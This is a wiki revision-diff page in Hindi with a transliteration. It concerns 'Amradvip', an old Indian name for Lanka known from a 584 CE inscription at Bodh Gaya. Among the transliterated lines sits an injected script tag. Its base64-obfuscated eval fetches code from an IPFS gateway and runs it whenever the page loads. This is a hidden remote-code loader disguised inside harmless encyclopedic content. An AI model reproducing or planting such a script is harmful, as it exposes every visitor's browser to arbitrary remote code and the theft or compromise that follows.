Difference between revisions of "आम्रद्वीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''आम्रद्वीप''' लंका का एक प्राचीन भारतीय...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''आम्रद्वीप''' [[लंका]] का एक प्राचीन भारतीय नाम है, जो इस देश की भौगोलिक आकृति के अनुरूप है।  
'''आम्रद्वीप''' [[लंका]] का एक प्राचीन भारतीय नाम है, जो इस देश की भौगोलिक आकृति के अनुरूप है। इस नाम का उल्लेख [[बोधगया|बोधिगया]] से प्राप्त किसी महानामन् द्वितीय के एक [[अभिलेख]] में किया गया है। यह अभिलेख गुप्त संवत् 269=584 ई. का है। यह महाराज महानामन् सिंहल के पाली इतिहास का रचयिता हो सकता है। संभवत: यह अभिलेख इसी ने अपनी इस स्थान की यात्रा के संस्मारक रूप में उत्कीर्ण करवाया था।  
+
*इस नाम का उल्लेख [[बोधगया|बोधिगया]] से प्राप्त किसी महानामन् द्वितीय के एक [[अभिलेख]] में किया गया है।  
 +
*यह अभिलेख गुप्त संवत् 269=584 ई. का है।  
 +
*यह महाराज महानामन् सिंहल के पाली इतिहास का रचयिता हो सकता है।  
 +
*संभवत: यह अभिलेख इसी ने अपनी इस स्थान की यात्रा के संस्मारक रूप में उत्कीर्ण करवाया था।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Revision as of 12:15, 18 October 2011

amradvip lanka ka ek prachin bharatiy nam hai, jo is desh ki bhaugolik akriti ke anuroop hai.

  • is nam ka ullekh bodhigaya se prapt kisi mahanamanh dvitiy ke ek abhilekh mean kiya gaya hai.
  • yah abhilekh gupt sanvath 269=584 ee. ka hai.
  • yah maharaj mahanamanh sianhal ke pali itihas ka rachayita ho sakata hai.
  • sanbhavat: yah abhilekh isi ne apani is sthan ki yatra ke sansmarak roop mean utkirn karavaya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh